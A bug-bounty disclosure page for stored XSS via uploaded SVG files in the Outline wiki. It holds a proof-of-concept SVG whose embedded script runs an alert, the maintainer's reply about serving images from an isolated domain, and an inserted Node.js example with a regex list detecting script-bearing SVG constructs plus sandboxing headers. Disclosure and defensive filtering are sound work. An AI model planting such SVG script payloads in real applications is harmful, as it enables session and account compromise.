xss via svg file in outline/outline

Valid

Reported on

Jul 1st 2022


Description

xss via svg file

Proof of Concept

1. Go to your account and create a document under a collection.
2. Now edit this document and upload the SVG file below into the document content as an image.

filename --> evil.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>

3. After uploading, open the SVG file URL and observe that the XSS is executed.

Impact

xss to control victim account

We are processing your report and will contact the outline team within 24 hours. a month ago
ranjit-git modified the report
a month ago
We have contacted a member of the outline team and are waiting to hear back a month ago
Tom Moor
a month ago

Maintainer


Scripts within SVGs are a feature of the format; they are not inherently a bug or security issue. Images are hosted on a completely separate domain without any cookies or other user data. Are you able to prove XSS to control a victim's account?
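The two defensive points raised in this thread, an upload-time check for script-bearing SVG constructs and the isolated-origin delivery the maintainer describes, can be shown in a few lines of Node.js. This is an added example, not Outline's code and not from the reporter or maintainer: the function names inspectSvgUpload and headersForUntrustedUpload, the pattern list, and the sample SVG strings are all constructed here. The scan goes beyond the report's bare script element to the other SVG constructs that carry script (event-handler attributes, javascript: URLs, foreignObject, entity declarations); it is a regex pre-filter for logging and rejecting obvious cases, not a substitute for an XML-aware sanitiser or for the origin isolation in the second function.

```javascript
// Added example (not Outline's code): flag the script-bearing SVG constructs
// that a report like the one above relies on, and build the response headers
// for serving user uploads from an isolated, cookieless origin.

// Constructed sample: the shape of the SVG posted in the report.
const REPORTED_SVG = `<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(1);</script>
</svg>`;

// Constructed sample: an ordinary image that must pass the check.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>`;

// Constructed sample: script carried by an attribute rather than an element,
// so a check that only looks for <script> would miss it.
const EVENT_SVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="void 0">
  <rect width="1" height="1"/>
</svg>`;

// Constructs that let an SVG execute script when opened as a top-level
// document. Regex matching is deliberately coarse (it errs toward flagging).
const PATTERNS = [
  { name: 'script-element', re: /<\s*script\b/i },
  { name: 'event-handler-attribute', re: /\s+on[a-z]+\s*=/i },
  { name: 'javascript-url', re: /(?:href|xlink:href)\s*=\s*["']?\s*javascript:/i },
  { name: 'foreignObject-element', re: /<\s*foreignObject\b/i },
  { name: 'entity-declaration', re: /<!ENTITY\b/i },
];

// Returns { flagged, findings } for an SVG body received at upload time.
// A flagged upload should be rejected or logged; an unflagged one is still
// served only through headersForUntrustedUpload below.
function inspectSvgUpload(svgText) {
  const findings = PATTERNS.filter((p) => p.re.test(svgText)).map((p) => p.name);
  return { flagged: findings.length > 0, findings };
}

// Headers for serving an upload from the separate image origin. The file is
// still delivered as image/svg+xml so <img> references keep working, but a
// direct visit to the URL lands in a sandboxed document with no script
// execution, no network access and (on a cookieless host) no user data.
function headersForUntrustedUpload(filename) {
  const safeName = filename.replace(/["\\\r\n]/g, '');
  return {
    'Content-Type': 'image/svg+xml',
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "sandbox; default-src 'none'; style-src 'unsafe-inline'",
    'Content-Disposition': `inline; filename="${safeName}"`,
    'Cache-Control': 'private, no-transform',
  };
}

// Demonstration over the constructed samples.
function demo() {
  return {
    reported: inspectSvgUpload(REPORTED_SVG),
    benign: inspectSvgUpload(BENIGN_SVG),
    event: inspectSvgUpload(EVENT_SVG),
    headers: headersForUntrustedUpload('evil.svg'),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The CSP sandbox directive with no allow-scripts token is what actually neutralises a script that slips past the scan, and it only helps if the upload host really is a separate registrable domain with no session cookies, which is the property the maintainer relies on above. For a production sanitiser, an XML-aware library (DOMPurify has an SVG profile) is preferable to the regex list here.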

ranjit-git modified the report
a month ago
outline/outline maintainer has acknowledged this report a month ago
Tom Moor validated this vulnerability 18 days ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 206545 18 days ago
The fix bounty has been dropped